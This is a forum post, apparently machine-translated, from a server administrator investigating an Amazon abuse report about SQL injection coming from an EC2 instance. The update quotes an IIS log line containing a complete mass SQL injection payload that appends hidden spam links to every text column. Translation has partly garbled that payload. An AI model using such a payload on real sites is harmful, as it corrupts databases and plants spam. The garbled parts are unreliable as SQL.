我有一台 EC2 服务器(Win2008),上面有大约 10 个站点,除了端口 80 和 443 之外,它完全被锁定。我只能从我的家庭和工作 IP 地址访问端口 3389 和 21。
我刚刚从亚马逊收到了以下邮件:
我们收到一份报告称您的实例:
实例 ID:i-XXXXXXX IP 地址:XX.XXX.XXX.XXX
一直在对互联网上的远程主机进行非法入侵尝试;请查看滥用报告者下面提供的信息。
2015 年 6 月 21 日 06:52:07 (GMT +8),源 IP XX.XXX.XXX.XXX 已尝试:* SQL 注入尝试
所以我对此感到有些吃惊。我浏览了所有网站,没有发现任何迹象表明网站已被入侵,或者有人入侵了服务器?
这可能是一个错误,还是有人掩盖了自己的 IP 地址并使用了我的服务器?我可以使用其他任何想法或工具来进一步调查此事,以查看是否存在泄露?
任何帮助都值得感激。谢谢。
更新
我查看了所有 IIS 日志,发现以下内容
网站名称\logs\W3SVC50\u_ex150620.log 1493 2015-06-20 19:22:27 10.120.9.175 GET /downloads-section.aspx d=9');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''i%20dream ed%20my%20husband%20cheated%20on%20me%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www.sharepointhelp.org''%2Bchar(47)%2B''pages''%2Bchar(47)%2B''page''%2Bchar(47)%2B''slug%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20does%20husbands%20cheat''%20when%201%20then%2 0''网站''%20else%20''重定向''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20how%20to%20cheat%20wife''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20O N%20o.NAME=TABLE_NAME%20WHERE(indid=0%20或%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20或%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 80 - 78.129.243.85 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NA ME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''我梦见我的丈夫欺骗了我+''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''为什么我的丈夫会欺骗我''+when+1+then+''网站''+else+''重定向''+en d++''+如何欺骗妻子''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- 200 0 0 15
但是,它试图附加到该页面上的查询字符串 d=9。但是我已仔细检查了该网站的代码,并且它有一个数字检查和转换。如果它失败了(上面的查询就是这样的),它就什么也不返回——这就是该网站正在做的事情,并且该 SQL 不会被执行。
所以现在更加困惑了!如果有其他建议,请多多包涵。